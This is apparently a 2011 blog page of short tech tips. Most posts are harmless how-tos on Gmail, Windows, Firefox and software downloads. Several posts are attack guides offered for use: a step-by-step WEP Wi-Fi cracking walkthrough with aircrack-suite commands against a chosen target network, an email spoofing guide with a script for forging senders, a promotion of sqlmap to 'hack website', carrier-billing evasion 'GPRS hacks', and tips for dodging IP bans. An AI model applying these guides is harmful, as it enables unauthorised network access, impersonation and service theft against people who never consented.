With the rapid growth of mobile phone usage in recent years, we have often observed that the mobile phone has become a part of many illegal and criminal activities. So in most cases, tracing the mobile number becomes a vital part of the investigation process. Also sometimes we just want to trace a mobile number for reasons like annoying prank calls, blackmails, unknown number in a missed call list or similar.
Even though it is not possible to trace the number back to the caller, it is possible to trace it to the location of the caller and also find the network operator. Just have a look at this page on tracing Indian mobile numbers from Wikipedia. Using the information provided on this page, it is possible to certainly trace any mobile number from India and find out the location (state/city) and network operator (mobile operator) of the caller. All you need for this is only the first 4-digit of the mobile number. In this Wiki page you will find all the mobile number series listed in a nice tabular column where they are categorized based on mobile operator and the zone (state/city). This Wiki page is updated regularly so as to provide up-to-date information on newly added mobile number series and operators. I have used this page many a time and have never been disappointed.
If you would like to use a simpler interface where in you can just enter the target mobile number and trace the desired details, you can try this link from Numbering Plans. Using this link, you can trace any number in the world.
By using the information in this article, you can only know “where” the call is from and not “who” the caller is. Only the mobile operator is able to tell you ”who” the caller is. So if you’re in an emergency and need to find out the actual person behind the call, I would recommend that you file a complaint and take the help of police. I hope this information has helped you!

Sunday, 1 May 2011

Hack website using SQL map | automatic SQL injection tool

Today i am going to write a sql injection tool. It's V 0.9 is just released. There are many changes in this tool from it's previous version. Sql injection is one of the top web application vulnerabilities. It's very important to check a website against this vulnerability.  

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a kick-ass detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Download Here:

Saturday, 30 April 2011

How to Hack WiFi (WEP) Using Backtrack 4

1. Boot Live CD/DVD of BackTrack 4. After it boots, type in "startx" to start GUI

2. Open new Konsole (backtrack's terminal).

3. Type, not using qoutes, "airodump-ng wlan0". Now find the network you want to attack. Copy the BSSID and the channel (write down on piece of paper and keep handy)

4. Open new Konsole, type "airodump-ng -w wep -c 11 --bssid 00:24:b2:80:d7:3c wlan0"   **X & 00:24:b2:80:d7:3c are examples of the channel and bssid you should have copied**

5. You are now fixed on to the network you want to attack.

6. Close the first Konsole, open a new Konsole and type "aireplay-ng -1 0 -a 00:24:b2:80:d7:3c wlan0"  **00:24:b2:80:d7:3c is an example as well**

7. Open another new Konsole, type "aireplay-ng -3 -b 00:24:b2:80:d7:3c wlan0"  **00:24:b2:80:d7:3c example"

8. Go to first Konsole, wait for the Data to reach to 30,000; go to 3rd Konsole, hit CNTL + C, then type in "dir", hit enter

9. Type "airecrack-ng wep.01.cap", hit enter.

10. Let it run its course, should only take a few moments. Once key is found, it will show up with semi-colons in it. Take out the semi-colons, and this will be the key. (Example of key; 53:06:66:51:50, so it will be 5306665150)

11. Enjoy Hacking, Enjoy Hackton.

Best IP Masking Software:Hide The IP

Protecting Identity over Internet is need of the hour and the first step towards it is by masking your actual Ip address.By masking IP address you will show fake IP address to online hackers.Everytime you visit a website your IP address is saved into the log of the website which can be abused by some evil minds if they gain access to website database.
The solution to this problem is Hide the Ip.We at PCTIPSTRICKS tested Top 10 IP Masking softwares and found Hide The Ip to be best in terms of Reliability,Ease Of Use,Protection,Speed and Price.Now with hide the IP you can surf anonymously with just a click of a button
Here are the Key features of Hide The Ip
One click to completely MASK your IP address. Others will see the hidden IP address which masking your real IP, and protecting your privacy.
You decide which country to be indicated as your origin by simply choosing from a country list. We have hundreds, hourly updated IP addresses available for use.
You are protected from hackers who will be tricked by your new IP address instead of your real. They will never be able to find any information about you by tracing the masked IP.
Hide your IP in E-mail headers. Be protected while sending emails from Yahoo!, Hotmail, GMail. Upgrading to Platinum Service add-on will protect you in Outlook!
Surf anonymously websites restricted for your country. Surf in forums on which you were banned.
This software is compatible with all versions of windows i.e Windows XP/2000/2003/NT/Vista/7
It is also compatible with all latest Browsers i.e Firefox/Safari/Opera/Internet Explorer/Chrome
So what are you waiting for?Download the Free Trial version of the software and Mask your ip Address.
Click Here To Download Hide The Ip

Friday, 29 April 2011


In this post i have described about the reliance free GPRS 3G internet hack using UCWEB 7.7.I have attached new UCWEB 7.7 for huge mobile downloaders since it the best download manager forever.You can use the given UCWEB version on both 2G GSM mode and 3 UMTS mode.You have to set the UMTS mode if you want to use the UCWEB reliance handler in 3G speed.
    I hope you have Reliance rcomwap settings on your mobile phone.The UCWEB modded version i attached here may called SUPER RIM MODDED version since it gives best speed.One of the RIM GSM customer got around 400KB/s download speed in his mobile.Upload is also possible,but he got around 50KB/s.

Change your IP Address

If you would like to change your IP Address then try each step carefully. There are many reasons why you might want to change your IP Address. Most people change it because they have been IP banned on websites for breaking the terms of service. When you are IP banned you have no access to the site, so you cannot visit the website if you’re IP is blocked. These tips will help you to change your IP Address.

If you have a Dynamic IP Address then un plug the cable modem for at least 10 minutes. After ten minutes plug the modem in and be patient till it connects. This will only work if your IP address is dynamic.

YouTube: Delete a Video

Have you uploaded an embarrassing video or footage of yourself that you don’t like? Don’t worry, in this article I will be showing you how to delete the video. Deleting videos on YouTube is simple, follow the simple steps below to learn how.

  • First of all, you will need to Sign in to your YouTube account.
  • Select your Username at the top right corner next to Sign Out.
  • Choose My Videos from the drop down list.
  • Tick the checkbox besides the video you would like to delete.
  • Under My Uploaded Videos, click the Delete button and confirm it.

Gmail: Add Signature to Messages

Would like to have a signature in every message you send on Gmail? Don’t be troubled, in this article I will be showing you how to create your own signature that will appear in every single message send. Follow the simple steps below.

  • First of all, sign in to your Gmail.
  • Select Settings at the top of the page, it’s beside your email address.
  • Scroll down to Signature and enter the text you would like to appear as your signature each time you send a message.
  • Now click the Save Changes button at the bottom.

MS Word: Protecting Document with a Password

Everyone wants to protect their Microsoft Word document files, from this trick you can create your own password on the document that you want to protect. In this article, I will be showing you how to secure your document with a password with the following steps.
  1. First of all open the document that you would like to protect. You can open it by searching Microsoft Word in search or you can go to All Programmes > Microsoft Folder > Microsoft Office Word.
  2. When the document is opened, click the Review tab at the top.
  3. Select Protect Document on the right side, it should have an icon of a document and a yellow padlock.
  4. A sidebar will appear on the right, click the button “Yes, Start Enforcing Protection”. When you have clicked that a pop up will appear asking you to create a password for the document.
Remember other people who use your computer won’t be able to open the Microsoft Word Document without the password.

How To Sign Out of Gmail Account Remotely

Gmail is one of the widely use email service.There are lot of features in gmail. There is a security feature for gmail known as remote logout. Many of use more than one computers to login to gmail account. Some times we often leave the browser opened & not being logged out of gmail or we are in cyber cafe and any power cut or computer faliure occurs and  if the computer is at office or any public place your account may be hacked or misused by someone else.
But there is a method by which you can l;og out from your gmail account remotely.
Open you gmail account and go to bottom of the page ,there you will see something as shown below..
Now you can click on “Details”  which shows you a pop-up having details about your last sessions.Click on “Sign out all other sessions” to sign out of gmail at all other places exept the current.
By this simple feature you can check that your gmail account is hacked or not.

How to Use God Mode in Windows 7

Windows 7 is now becoming popular among windows operating system  users.Windows 7 has cool hidden feature ,people calls it godmode in windows 7.GodMode is a folder that brings together a long list of customization settings allowing you to change all your settings from one place.This is very good as you can now change all your windows settings from one single place.
God Mode in Windows 7
God Mode in Windows 7
Foll the following steps to create god mode folder:
1. Create a new folder
2. Rename the folder to GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}
You can change word GodMode to any other word you like your name or your friends name

3.The folder icon will change ,then  double click it to show the GodMode windows options.

Thursday, 28 April 2011

Install Windows XP Very Fast

Now, this tip will be very helpful for those who frequently install windows xp operating system. Normally OS installation takes around 40 minutes to complete, but through this trick you can now save 10-15 minutes. This simple tricks goes this way.
1. Boot through Windows XP CD.
2. After all the files are completely loaded, you get the option to select the partition. Select “c”.
3. Now Format the partition, whether it is normal or quick with NTFS or FAT
4. Once the formatting is completed, All the setup files required for installation are copied. Restart your system by pressing Enter.
Now, here begins the Simple trick to save 10-15 minutes.
5. After rebooting, you get a screen where it takes 40 minutes to complete or finalize the OS installation.
6. Now, Press SHIFT + F10 Key ->  This opens command prompt.
7. Enter “Taskmgr” at the command prompt window. This will open Task Manager.
8. Click the Process Tab, here we find a process called Setup.exe -> Right Click on Setup.exe -> Set Priority -> Select High or Above Normal. Initially it will be Normal.
Thats it, no more work to do. Relax your self and see how fast the installation process completes

Download Latest uTorrent 3.0 Beta 25229

µTorrent is a small and incredibly popular BitTorrent client.
Micro-Sized Yet Feature Filled
Most of the features present in other BitTorrent clients are present in µTorrent, including bandwidth prioritization, scheduling, RSS auto-downloading and Mainline DHT (compatible with BitComet). Additionally, µTorrent supports the Protocol Encryption joint specification (compatible with Azureus and above, BitComet 0.63 and above) and peer exchange.
µTorrent was written with efficiency in mind. Unlike many torrent clients, it does not hog valuable system resources - typically using less than 6MB of memory, allowing you to use the computer as if it weren't there at all. Additionally, the program itself is contained within a single executable less than 220 KB in size.
Skinnable and Localized
Various icon, toolbar graphic and status icon replacements are available, and creating your own is very simple. µTorrent also has support for localization, and with a language file present, will automatically switch to your system language. If your language isn't available, you can easily add your own, or edit other existing translations to improve them!
Actively Developed and Improved
The developer puts in a lot of time working on features and making things more user-friendly. Releases only come out when they're ready, with no schedule pressures, so the few bugs that appear are quickly addressed and fixed


This technique involves registry editing, so make backup of the registry..

step-1: Copy/Paste the following code in Notepad.

Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOTCLSID{20D04FE0-3AEA-1069-A2D8-08002B30309D}shellRegistry Editor] @="Name of the Application"
[HKEY_CLASSES_ROOTCLSID{20D04FE0-3AEA-1069-A2D8-08002B30309D}shellRegistry Editorcommand] @="Location Of The Application"

Step-2:Now edit the name of application and location of application.

For example for adding firefox option,
[HKEY_CLASSES_ROOTCLSID{20D04FE0-3AEA-1069-A2D8-08002B30309D}shellRegistry Editor] @="Firefox"
[HKEY_CLASSES_ROOTCLSID{20D04FE0-3AEA-1069-A2D8-08002B30309D}shellRegistry Editorcommand] @="C:\Program Files\Mozilla Firefox\firefox.exe"

How to Send Fake Emails

Most of us are very curious to know a method to send anonymous emails to our friends for fun. But the question is, is it possible to send anonymous emails in spite of the advanced spam filtering technology adopted by email service provides like Gmail, Yahoo etc? The answer is YES, it is still possible to bypass their spam filters and send anonymous emails to your friends. For example, you can send an email to your friend with the following sender details.
From: Bill Gates <>
The art of sending this kind emails is known as Email Spoofing. In my previous post on How to Send Fake Email I insisted on using your own SMTP server to send anonymous emails. This method used to work successfully in the past, but today it has a very low success rate since Gmail and Yahoo(all major email service providers) blocks the emails that are sent directly from a PC. In this post I have come up with a new way to send anonymous emails (spoofed emails) that has 100% success rate. If you have to successfully send an anonymous email or spoofed email, you should send it using a relay server.
What is a Relay Server?
In simple words, a relay server is an SMTP Server that is trusted by Google or Yahoo as an authorised sender of the email. So, when you send an email using a relay server, the email service providers like Yahoo and Gmail blindly accept the emails and deliver it to the inbox of the recipient. If the SMTP server is not authorised, Google and Yahoo will reject all the emails sent from this SMTP server. This is the reason for which using our own SMTP server to send emails fail.
So What’s Next?
Now all we have to do is, find a trusted SMTP server to Send Spoofed Emails. Usually all the emails that are sent from web hosting providers are trusted and authorised. So, you have to find a free web hosting provider that allows you to send emails. But, most of the free Web Hosts disable the Mail feature and do not allow the users to send emails. This is done just to avoid spamming. However all the paid hosting plans allow you to send any number of emails. Once you find a hosting service that allows to send emails from their servers, it’s just a cakewalk to send anonymous emails. All we have to do is just modify the email headers to insert the spoofed From address field into it.
I have created a PHP script that allows you to send emails from any name and email address of your choice. Here is a step-by-step procedure to setup your own Anonymous Email Sender Script
1. Goto X10 Hosting  and register a new account.
2. Download my Anonymous Email Sender Script (sendmail.rar).
3. Login to your FreeWebHostingArea Account and click on File Manager.
4. Upload the sendmail.php, pngimg.php and bg1.PNG files to the server.
5. Set permissions for sendmail.php, pngimg.php and bg1.PNG to 777.
6. Now type the following URL
NOTE: yoursite must be substituted by the name of the subdomain that you have chosen during the registration process.
7. Use the script to send Anonymous Emails. Enjoy!!!

Download Norton 360 Version 4.0 2011 For Free

Well this ain’t a joke.Norton is giving away its Norton360 Version 4.0   and norton antivirus 2011 for 90 days free trial i.e 3 months.This is a special promotional offer.This is an OEM setup installer that has been released by norton in conjunction with microsoft.
If you will directly go to the norton website you will not be able to benefit from this offer instead you will get only a 30-day trial version only after entering your credit card details.But if you use the link that I am giving at the end of this post you will get a 90 day trial and doesnot require to enter your credit card details.
So dont waste your time and try the best antivirus solution as the new norton 2011
  • Provides excellent protection against viruses,spywares.
  • Its lightweight and uses less system resources.
  • Specially Designed for windows 7
Click the link below to download Norton 360 Version 4.0  Or antivirus 2011 for free
Download Norton360 Version 4.0 2011 for free

Wednesday, 27 April 2011

Best Funny Firefox Tricks

Firefox is one of best browser and there are some funny tricks that you can do with your firefox browser.These will not harm your browser and they are tested in the latest version of firefox i.e firefox 4.0

Here are Some Funny Firefox Tricks
To perform these tricks open your firefox browser and copy/paste the following in your address bar
  • chrome://global/content/alerts/alert.xul
This will show you dancing firefox.Your firefox window will automatically popup anywhere at screen.
  • · chrome://browser/content/browser.xul
This will open another firefox within in a new tab.So you will have firefox within firefox.
  • · chrome://browser/content/preferences/preferences.xul
This will open firefox options dialog box in new tab.
  • · chrome://browser/content/bookmarks/bookmarksPanel.xul
This will open your firefox bookmark manager in new tab.
  • · chrome://browser/content/history/history-panel.xul
This will open your history in new tab.
  • · chrome://mozapps/content/extensions/extensions.xul?type=extensions
This will open your extensions tab in your current window .
  • · chrome://browser/content/preferences/cookies.xul
This will Open the “cookies window” inside a tab in the Firefox window.

  • · chrome://browser/content/preferences/sanitize.xul
This will Open the “Clear Private Data” window inside the current tab.

  • · chrome://browser/content/aboutDialog.xul
This will Open the “About Firefox” Dialog box inside the tab.

  • · chrome://browser/content/credits.xhtml
This will Open a scrolling list of names. The one’s who we must thank for creating Firefox

MobeeFree - TalkFree VoIP Service - 20 Free minutes to call India mobile

MobeeFree, a service from, is offering 20 Free minutes to call India mobile or 7 Free minutes to call Bangladesh mobile or 4 Free minutes to call Pakistan mobile. MobeeFree can be used for mobile dialer, ATA and PC dialer services.

Sign Up on to get free trial credit.

  • Call from Computer, Download the mobeefree PC dialer from their website.
  • Call from Mobile Phone, The mobeefree mobile VoIP dialer is compatible with most Nokia 3rd and 5th edition phones.
  • Call from your Home Phone using call back service.
  • Mobeefree SIP calling using proxy
  • Send SMS Messages
Become MobeeFree reseller:
Mobeefree credit can be purchased from local reseller. If you are not reseller, you can become MobeeFree reseller or agent after you add $100 funds to your account and click on Become Local Agent to instantly upgrade yourself. MobeeFree provides monthly commissions to all resellers based on selling coupon vouchers to end users in market. MobeeFree is much like ActionVoIP, Rynga or other coupon based brands. Except, resellers earn commissions every month based on monthly sales.

Downlaod Latest AVG Free Edition 10.0.1325 (32-bit)

AVG Anti-Virus Free Edition is trusted antivirus and antispyware protection for Windows available to download for free. In addition, the new included LinkScanner® Active Surf-Shield checks web pages for threats at the only time that matters - when you're about to click that link.
AVG Anti-Virus Free has these following features:
  • Award-winning antivirus and antispyware
  • Real-time safe internet surfing and searching
  • Quality proven by 80 million of users
  • Easy to download, install and use
  • Protection against viruses and spyware
  • Compatible with Windows 7, Windows Vista and Windows XP
AVG Anti-Virus Free Edition is only available for single computer use for home and non commercial use.
This is the 32-bit version.


To activate the Aircel To Aircel 20p/min pack you must have balance greater than 5rs.if you have more than 5rs account balance then tune your fingers to dial *122*400# .You will be charges Rs.4.00 for activating the above pack.The special call tariff comes with the validity of 1 year.

All Facebook Chat Slang Codes

Slang’s have become very common in chat’s,Sms,emails.People new  to these slang’s find really difficult to understand converstion.On the other hand it saves a lot of time and effort if slang’s are used.I will give the most commonly used Slangs with there meanings that are used in facebook chat or Sms.

Here are the Most Commonly used Facebook chat slang’s
ASAP    As Soon As Possible
GN         Good Night
M/F       Are You Male or Female?
ASL        Tell me your Age,Sex and Location
IDK        I don’t Know
SD           Sweet Dreams
BRB        Be Right Back
JK            Just Kidding
Tnx        Thanks
BTW       By The Way
K               Okay
TY           Thank You
ROFL      Rolling on Floor Laughing
LOL         Laugh out Loud
TTYL     Talk to you later
FYI          For Your Information
LMAO    Laugh My Ass Out
WTF        What The F**k
FB             Facebook
LMFAO     Laugh my f**king ass off
WTH      What the hell
GM          Good Morning
LMK       Let Me Know
zzz          Sleeping
BFF        Best Friends Forever
Jk           Just kidding
B4          Before
L8          Late
gr8        great

plz        please

sry       sorry

bbz       babes

kk         okay

kl          cool

Tuesday, 26 April 2011

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This trick works on both in 2G network and 3G network.
This trick helps to the peoples those cannot use Front query and back query.You should maintain 0rs balance to enjoy this trick and avoid further balance deduction.enter the following address in your address bar:
Here you have to replace the to the webaddress you want to browse.For example: .
You have to use either rcomwap settings or smartwap settings to browse and download unlimited in Reliance GSM network.

Trick To Create Invisble Folder Without Name In Windows 7 And Vista

Windows 7 and vista allows you to create an invisible folder without any logo and name.If you have some private data and want to hide it from pirating eyes without using any external software then certainly you will benefit from this tutorial.
If you want to protect your data using password then you can read my post on Axcrypt:Free Encryption Software or Bitlocker Encryption utility
In this tutorial we will protect our data first placing it in an invisible folder and then hiding it so that no one can even accidentaly open that folder.So this will provide you with two level security.
How To Create A Folder Without Name In Windows 7 And Vista?

  1. Click on Start Button in taskbar
  2. Search For Character Map
  3. Open character Map and click on the blank Coloumn
  4. Now Click on Select Button and then on Copy Button(Now you have copied a blank Space)
  5. Create a New folder and Rename it and press Ctrl+V keys from keyboard.
By this time we have created a folder without any name.Now we have to create a folder without any Logo.
invisible Trick To Create Invisble Folder Without Name In Windows 7 And Vista
How To Create An Invisible Folder  In Windows 7 And Vista?
  1. Right click on the folder that you have created without name in the previous step.
  2. Click on Properties>>Customise>>Change Icon
  3. Now will get a popup windows with various icon.Select the blank Icon
  4. 4. Press Ok By this time you have created an Invisible folder with no logo and no name.
    Move all of your private data in this invisible folder.
    How To Hide the Invisible Folder In Windows 7 And Vista?
  5. Right Click on the Invisible Folder
  6. Select Properties and now select the Hidden Checkbox.